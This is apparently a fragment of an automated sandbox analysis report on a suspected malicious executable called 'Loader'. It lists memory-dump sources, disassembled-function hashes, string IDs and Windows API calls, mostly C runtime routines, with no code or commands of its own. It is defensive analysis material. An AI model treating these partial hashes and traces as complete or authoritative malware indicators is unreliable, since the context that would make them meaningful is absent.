                                                                                                  • Instruction ID: 2a4d16ae9d10ea560b77a44006629ae05b16b8abffc009c926db39090a0543a8
                                                                                                  • Opcode Fuzzy Hash: 4d4c93a943bb9e5628ef04f7d660ed5e209d9d36a32a9237fb0ec7ff85396e54
                                                                                                  • Instruction Fuzzy Hash: 32B15872A043209BD7149F24EC5267BB3E1EF91324F59882EE9C597391E27CED05C39A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e3eac9f5a342f0ea475e847be8fd93203d42c8fe64f90c910acd277ebcb38aa0
                                                                                                  • Instruction ID: be635a2fd6671dd2a9ba3af1a9d7190616493300f6d6b226ffd202de56145e58
                                                                                                  • Opcode Fuzzy Hash: e3eac9f5a342f0ea475e847be8fd93203d42c8fe64f90c910acd277ebcb38aa0
                                                                                                  • Instruction Fuzzy Hash: 9B31D56550C2D28BD7298B3590A07BBBFE05FA7304F58449ED0DA9B393DB388505CB9A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_400000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 758b8aea2632601ad67c44bbbb1234759ef856b118d4acac0c5124b795d154ab
                                                                                                  • Instruction ID: 7b8e8de8b0e87bbe651cddee71a68367ada956532eac00abcddc917e29628124
                                                                                                  • Opcode Fuzzy Hash: 758b8aea2632601ad67c44bbbb1234759ef856b118d4acac0c5124b795d154ab
                                                                                                  • Instruction Fuzzy Hash: 4631F96560C3D28BD7289B3590A07BBBBD15FA7304F58449ED0DA97383DB388505CB9A
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 90e47eff8722843e55d2b836a4d03353b2a5316e5d4709d927c08e5e4bd4e224
• Instruction ID: 03fdce15f3cc6b7568d0b180210775aee25512d427aab44fbe6dfd48d3dfaed6
• Opcode Fuzzy Hash: 90e47eff8722843e55d2b836a4d03353b2a5316e5d4709d927c08e5e4bd4e224
• Instruction Fuzzy Hash: 35313474B04300AFF7149BA49C80B7BBBA4EB86710F24452DE685A72A1C376FC65C749
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressCloseFileHandleProcSize
                                                                                                  • String ID: CreateFileA
                                                                                                  • API String ID: 2836222988-1429953656
                                                                                                  • Opcode ID: 4c7517ec2b4ed84a80a23f6ffb545f2e7db7fec9c4bef088de2e260d11bbc5b1
                                                                                                  • Instruction ID: 9ced4854466b94e310d836d3756a39455da84b23b0bbf02b7e6ea236ac85a499
                                                                                                  • Opcode Fuzzy Hash: 4c7517ec2b4ed84a80a23f6ffb545f2e7db7fec9c4bef088de2e260d11bbc5b1
                                                                                                  • Instruction Fuzzy Hash: FD41B5B4D083099FCB04EFA8D4986AEBBF0EF49315F048529E899E7350D7749545CFA2
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                  • String ID:
                                                                                                  • API String ID: 127012223-0
                                                                                                  • Opcode ID: d12911e7b6b62be68f40aa7b57fe053cb10609d77908521380ee00cc30ebdd87
                                                                                                  • Instruction ID: 15fad44837684110af583bd7997a4025f4bfbafedad3228c435e9b08788fcfd7
                                                                                                  • Opcode Fuzzy Hash: d12911e7b6b62be68f40aa7b57fe053cb10609d77908521380ee00cc30ebdd87
                                                                                                  • Instruction Fuzzy Hash: D1710432940215ABDF209F94CC42BAE7BB9EF4531AF280055FC14B7281D7B5DC888776
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                                  • Instruction ID: 497d89c6443eeaffc1686b007b2b10de8b68db27d4be154b6bcbdbf5d3660270
                                                                                                  • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                                  • Instruction Fuzzy Hash: 86B14872D00395AFDB11CF28CC91BAEBBA5EF55390F284165E944AB282DB74D901DBB0
APIs
• _ValidateLocalCookies.LIBCMT ref: 00D3ABE7
• ___except_validate_context_record.LIBVCRUNTIME ref: 00D3ABEF
• _ValidateLocalCookies.LIBCMT ref: 00D3AC78
• __IsNonwritableInCurrentImage.LIBCMT ref: 00D3ACA3
• _ValidateLocalCookies.LIBCMT ref: 00D3ACF8
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00D46751,00000000,00000000,00000000,00000000), ref: 00D46703
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetLastError.KERNEL32(?,?,00D44464,00D3A97D,00D39BD4), ref: 00D4447B
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D44489
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D444A2
• SetLastError.KERNEL32(00000000,00D44464,00D3A97D,00D39BD4), ref: 00D444F4
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• type_info::operator==.LIBVCRUNTIME ref: 00D44E6B
• CallUnexpected.LIBVCRUNTIME ref: 00D450E4
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: CallUnexpectedtype_info::operator==
• String ID: csm$csm$csm
• API String ID: 2673424686-393685449
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00D55684,000000FF,?,00D3F2B9,00D3F1A0,?,00D3F355,00000000), ref: 00D3F22D
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D3F23F
• FreeLibrary.KERNEL32(00000000,?,?,00000000,00D55684,000000FF,?,00D3F2B9,00D3F1A0,?,00D3F355,00000000), ref: 00D3F261
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
APIs
• __alloca_probe_16.LIBCMT ref: 00D46EAF
• __alloca_probe_16.LIBCMT ref: 00D46F78
• __freea.LIBCMT ref: 00D46FDF
  • Part of subcall function 00D456F1: HeapAlloc.KERNEL32(00000000,00D47675,?,?,00D47675,00000220,?,?,?), ref: 00D45723
• __freea.LIBCMT ref: 00D46FF2
• __freea.LIBCMT ref: 00D46FFF
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocHeap
• String ID:
• API String ID: 1096550386-0
APIs
• __EH_prolog3.LIBCMT ref: 00D377F9
• std::_Lockit::_Lockit.LIBCPMT ref: 00D37804
• std::_Lockit::~_Lockit.LIBCPMT ref: 00D37872
  • Part of subcall function 00D376EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D37707
• std::locale::_Setgloballocale.LIBCPMT ref: 00D3781F
• _Yarn.LIBCPMT ref: 00D37835
Memory Dump Source
• Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: FreeLibrary
• String ID: 8$; ,)$?&x+
• API String ID: 3664257935-698864271
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 00427925
Strings
Memory Dump Source
• Source File: 00000002.00000002.2921286161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2921286161.0000000000452000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_Loader.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: :W>Q$RS$V3O=
• API String ID: 237503144-1471300816
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                  • String ID: FreeConsole$kernel32.dll
                                                                                                  • API String ID: 1646373207-2564406000
                                                                                                  • Opcode ID: 2016b84e7c3406486cc17a8fcdd8eac3ba95a470cdecb385b44dbd97af8ab675
                                                                                                  • Instruction ID: a7490486963df065302b76c098ad7f38ca6a064f4f5e8cb866b260b06e357f5f
                                                                                                  • Opcode Fuzzy Hash: 2016b84e7c3406486cc17a8fcdd8eac3ba95a470cdecb385b44dbd97af8ab675
                                                                                                  • Instruction Fuzzy Hash: 2C0166B0E043089FCB44EFB8D94559DBBF4EB48301F41856AE849D7351EB74A6548FA2
                                                                                                  APIs
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D4F74C,00000000,?,00D61E20,?,?,?,00D4F683,00000004,InitializeCriticalSectionEx,00D590D4,00D590DC), ref: 00D4F6BD
                                                                                                  • GetLastError.KERNEL32(?,00D4F74C,00000000,?,00D61E20,?,?,?,00D4F683,00000004,InitializeCriticalSectionEx,00D590D4,00D590DC,00000000,?,00D4539C), ref: 00D4F6C7
                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D4F6EF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                  • String ID: api-ms-
                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                  • Opcode ID: a68cb97fd23479af0a32b8e1b66ba6b1ab24fe03618414a20a067ca5ba596a23
                                                                                                  • Instruction ID: 014e889030dcf955d5b1ecae703c09737078cca3275db7b3fdf8a75ba11b6726
                                                                                                  • Opcode Fuzzy Hash: a68cb97fd23479af0a32b8e1b66ba6b1ab24fe03618414a20a067ca5ba596a23
                                                                                                  • Instruction Fuzzy Hash: 7EE01230640305BBEB242B61DC0AB593B549B00B56F240070FD0CE41F1DBA29A5099B4
                                                                                                  APIs
                                                                                                  • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00D4D7B1
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D4DA03
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D4DA49
                                                                                                  • GetLastError.KERNEL32 ref: 00D4DAEC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 2112829910-0
                                                                                                  • Opcode ID: ef8265762874c23bdb00d6e46473d1172183b141cb0650662a8d741c65e317be
                                                                                                  • Instruction ID: 82a52bb09c43c81c5781dc12d4e26a9cc18c62cee8e2d19100ddef69c7475478
                                                                                                  • Opcode Fuzzy Hash: ef8265762874c23bdb00d6e46473d1172183b141cb0650662a8d741c65e317be
                                                                                                  • Instruction Fuzzy Hash: 78D179B5D042489FCF15CFA8C881AADBBB6FF09314F28416AE856EB351D770A941CF60
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AdjustPointer
                                                                                                  • String ID:
                                                                                                  • API String ID: 1740715915-0
                                                                                                  • Opcode ID: 7915c3f0475611b58afe7dea3ccb23f4adf9ef32255b767827627a6ed1765062
                                                                                                  • Instruction ID: ee907328bb4045a527a5194bd8235fa823d1eaacd5f686dc4bc97bdfd0074029
                                                                                                  • Opcode Fuzzy Hash: 7915c3f0475611b58afe7dea3ccb23f4adf9ef32255b767827627a6ed1765062
                                                                                                  • Instruction Fuzzy Hash: 7951E372A052069FDB298F54D881BBAB7A9FF04311F18452DE9559B291D731ECC0CBB0
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • GetLastError.KERNEL32 ref: 00D4B5DA
                                                                                                  • __dosmaperr.LIBCMT ref: 00D4B5E1
                                                                                                  • GetLastError.KERNEL32 ref: 00D4B61B
                                                                                                  • __dosmaperr.LIBCMT ref: 00D4B622
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1913693674-0
                                                                                                  • Opcode ID: 8e3304c42bd64ccb2156f1766ec48890397d6ab5cb3b95d80099800c3f25efd3
                                                                                                  • Instruction ID: 4d9e8ca46e5ea1e4e6b0e5e2bdac888de91c0f5c4ffdb548230135cd224fd082
                                                                                                  • Opcode Fuzzy Hash: 8e3304c42bd64ccb2156f1766ec48890397d6ab5cb3b95d80099800c3f25efd3
                                                                                                  • Instruction Fuzzy Hash: D621F371600309AFDB20AF76CC848ABB7A9FF24374715851AF859DB251E730ED408BB0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921540282.0000000000D60000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921553983.0000000000D64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921567890.0000000000D67000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1394db3c90124d369d7110d3d514eacec3eb3a395caf2824d78f98ec2b987be8
                                                                                                  • Instruction ID: c733222f5dd0c16da3c857bcbce6202ebd6c9124cefc7be3509ce7eecc68add5
                                                                                                  • Opcode Fuzzy Hash: 1394db3c90124d369d7110d3d514eacec3eb3a395caf2824d78f98ec2b987be8
                                                                                                  • Instruction Fuzzy Hash: 5221CD3222020DAF9B21EF75CC85A6A77A8EF40364F199524F819E7650EB31EC40DBB0
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 00D4C976
                                                                                                    • Part of subcall function 00D45801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D46FD5,?,00000000,-00000008), ref: 00D45862
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4C9AE
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D4C9CE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2921504307.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2921490182.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2921525052.0000000000D56000.00000002.00000001.01000000.00000003.sdmpDownload File
